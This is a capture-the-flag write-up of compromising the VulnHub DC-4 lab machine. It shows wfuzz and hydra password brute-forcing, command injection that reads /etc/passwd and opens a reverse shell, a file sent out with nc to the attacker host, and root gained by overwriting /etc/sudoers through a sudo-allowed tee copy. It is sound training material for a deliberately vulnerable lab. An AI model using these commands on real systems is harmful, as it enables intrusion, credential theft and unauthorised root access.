Posted on by

DC-4 – Writeup

Details

This machine is https://www.vulnhub.com/entry/dc-4,313/

Recon

First I needed the IP of the machine

root@kali:~# nmap -sn -T4 192.168.56.0/24
Nmap scan report for 192.168.56.1
Host is up (0.00026s latency).
MAC Address: 0A:00:27:00:00:00 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.00021s latency).
MAC Address: 08:00:27:DF:30:F1 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up (0.00019s latency).
MAC Address: 08:00:27:B3:AB:48 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.78 seconds

And service discovery

root@kali:~# nmap -sV -p- -T4 192.168.56.102
Nmap scan report for 192.168.56.102
Host is up (0.00013s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    nginx 1.15.10
MAC Address: 08:00:27:B3:AB:48 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.75 seconds

Shell Hunting

Start by checking the port 80 webserver http://192.168.56.102/

Screenshot 1

I tried some SQL injection but it didn't work, I then tried some brute forcing, guessing a username of admin as it was an admin panel. I tried using hydra but had some issues, so I setup wfuzz as it could filter based on result size, first running it normally to get the normal size

root@kali:~# wfuzz -v -z range,1-1 -d "id=FUZZ" -u http://192.168.56.102/login.php
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************
Target: http://192.168.56.102/login.php
Total requests: 1
==============================================================================================================================================
ID   C.Time   Response   Lines      Word         Chars                  Server                                             Redirect   Payload
==============================================================================================================================================
00001:  0.002s   C=302     15 L       17 W      206 Ch         nginx/1.15.10                                            index.php   "1"
Total time: 0.007344
Processed Requests: 1
Filtered Requests: 0
Requests/sec.: 136.1477

So it is normally 206 chars, so I filter that out

root@kali:~# wfuzz -v -z range,1-1 -d "id=FUZZ" --hh 206 -u http://192.168.56.102/login.php
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************
Target: http://192.168.56.102/login.php
Total requests: 1
==============================================================================================================================================
ID   C.Time   Response   Lines      Word         Chars                  Server                                             Redirect   Payload
==============================================================================================================================================
Total time: 0.008431
Processed Requests: 1
Filtered Requests: 1
Requests/sec.: 118.6004

Now I tried to use it to login, I had some issues with getting wfuzz to play nice with rockyou, I realised it was likely the size of the file so I created a smaller one

root@kali:~# head -10000 /usr/share/wordlists/rockyou.txt > rockFirst.txt

And used wfuzz again

root@kali:~# wfuzz -v -w rockFirst.txt -d "username=admin&password=FUZZ" --hh 206 -u http://192.168.56.102/login.php
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer                         *
********************************************************
Target: http://192.168.56.102/login.php
Total requests: 10000
==============================================================================================================================================
ID   C.Time   Response   Lines      Word         Chars                  Server                                             Redirect   Payload
==============================================================================================================================================
00463:  0.002s   C=302     15 L       28 W      367 Ch         nginx/1.15.10                                            index.php   "happy"
Total time: 21.77816
Processed Requests: 10000
Filtered Requests: 9999
Requests/sec.: 459.1754

The payload "happy" led to a change, so I tried it as the password using the creds

admin:happy

Screenshot 2

I worked, so I clicked command

Screenshot 3

My guess was it'll run commands, so I clicked run

Screenshot 4

The "ls -l" confirmed this for me, so I fired up burp and clicked run again

Screenshot 5

It seemed to pass the command from the radio parameter to to bash, so I tested it by changing it to

cat+/etc/passwd

Screenshot 6

Back on the page

Screenshot 7

It worked, so I tried to get a reverse shell out of it

root@kali:~# nc -nlvp 4444

Screenshot 8

connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 56184

A shell connected back

Time For Root

I tested the shell

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

And upgraded it

python -c "import pty;pty.spawn('/bin/bash')"
www-data@dc-4:/usr/share/nginx/html$

Time to dig

www-data@dc-4:/usr/share/nginx/html$ cd /home
www-data@dc-4:/home$ ls -la
drwxr-xr-x  5 root    root    4096 Apr  7 02:33 .
drwxr-xr-x 21 root    root    4096 Apr  5 20:24 ..
drwxr-xr-x  2 charles charles 4096 Apr  7 04:31 charles
drwxr-xr-x  3 jim     jim     4096 Apr  7 04:30 jim
drwxr-xr-x  2 sam     sam     4096 Apr  7 04:31 sam

I checked each dir, charles and sam had nothing useful, but jim

www-data@dc-4:/home/jim$ ls -la
drwxr-xr-x 3 jim  jim  4096 Apr  7 04:30 .
drwxr-xr-x 5 root root 4096 Apr  7 02:33 ..
-rw-r--r-- 1 jim  jim   220 Apr  6 20:02 .bash_logout
-rw-r--r-- 1 jim  jim  3526 Apr  6 20:02 .bashrc
-rw-r--r-- 1 jim  jim   675 Apr  6 20:02 .profile
drwxr-xr-x 2 jim  jim  4096 Apr  7 02:58 backups
-rw------- 1 jim  jim   528 Apr  6 20:20 mbox
-rwsrwxrwx 1 jim  jim   174 Apr  6 20:59 test.sh

Backups looked interesting

www-data@dc-4:/home/jim$ cd backups
www-data@dc-4:/home/jim/backups$ ls -la
drwxr-xr-x 2 jim jim 4096 Apr  7 02:58 .
drwxr-xr-x 3 jim jim 4096 Apr  7 04:30 ..
-rw-r--r-- 1 jim jim 2047 Apr  7 02:26 old-passwords.bak

Old passwords seemed to be a wordlist, so I extracted it to use with hydra

root@kali:~# nc -nvlp 6666 > old-passwords.bak
www-data@dc-4:/home/jim/backups$ nc 192.168.56.101 6666 < old-passwords.bak

So hydra time, it was in jim's home dir so I tried brute forcing jim

root@kali:~# hydra -l jim -P old-passwords.bak 192.168.56.102 ssh
[SNIP]
[22][ssh] host: 192.168.56.102   login: jim   password: jibril04
[SNIP]

So the creds are

jim:jibril04

So I logged in via ssh

root@kali:~# ssh jim@192.168.56.102
You have mail.
Last login: Sun Apr  7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$

It has mail so I looked at it

jim@dc-4:~$ cd /var/mail
jim@dc-4:/var/mail$ ls -la
drwxrwsr-x  2 root mail 4096 Apr  6 21:16 .
drwxr-xr-x 12 root root 4096 Apr  5 21:09 ..
-rw-rw----  1 jim  mail  715 Apr  6 21:16 jim
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
    (envelope-from <charles@dc-4>)
    id 1hCjIX-0000kO-Qt
    for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is:  ^xHhA&hvim0y
See ya,
Charles

So I su'd to charles using

^xHhA&hvim0y
jim@dc-4:/var/mail$ su charles
charles@dc-4:/var/mail$

And dug

charles@dc-4:/var/mail$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee

What is teehee?

charles@dc-4:/var/mail$ teehee -h
teehee: invalid option -- 'h'
Try 'teehee --help' for more information.
charles@dc-4:/var/mail$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.
  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help     display this help and exit
      --version  output version information and exit
MODE determines behavior with write errors on the outputs:
  'warn'         diagnose errors writing to any output
  'warn-nopipe'  diagnose errors writing to any output not a pipe
  'exit'         exit on error writing to any output
  'exit-nopipe'  exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.
GNU coreutils online help: <http://www.gnu.org/software/coreutils/>
Full documentation at: <http://www.gnu.org/software/coreutils/tee>
or available locally via: info '(coreutils) tee invocation'

So it's just tee, I can run it as root, so I can write as root and become root. I'll overwrite the sudoers file to give myself full access

Note: I should have used the -a flag to append rather than letting it overwrite

charles@dc-4:/var/mail$ echo "charles ALL=(ALL:ALL) ALL" | sudo teehee /etc/sudoers

A new sudo -l

charles@dc-4:/var/mail$ sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.
[sudo] password for charles:
User charles may run the following commands on dc-4:
    (ALL : ALL) ALL

Now I can get root

charles@dc-4:/var/mail$ sudo su
root@dc-4:/var/mail#

Time for the flag

root@dc-4:/var/mail# cd /root
root@dc-4:~# ls -la
drwx------  3 root root 4096 Apr  7 04:31 .
drwxr-xr-x 21 root root 4096 Apr  5 20:24 ..
-rw-------  1 root root   16 Apr  7 04:31 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  976 Apr  6 21:27 flag.txt
drwxr-xr-x  2 root root 4096 Apr  6 20:32 .nano
-rw-r--r--  1 root root  148 Aug 18  2015 .profile
root@dc-4:~# cat flag.txt
888       888          888 888      8888888b.                             888 888 888 888
888   o   888          888 888      888  "Y88b                            888 888 888 888
888  d8b  888          888 888      888    888                            888 888 888 888
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "88b d8P  Y8b 888 888 888 888
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      "   "   "   "
888P     Y888  "Y8888  888 888      8888888P"   "Y88P"  888  888  "Y8888  888 888 888 888
Congratulations!!!
Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.

Published by Jack

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.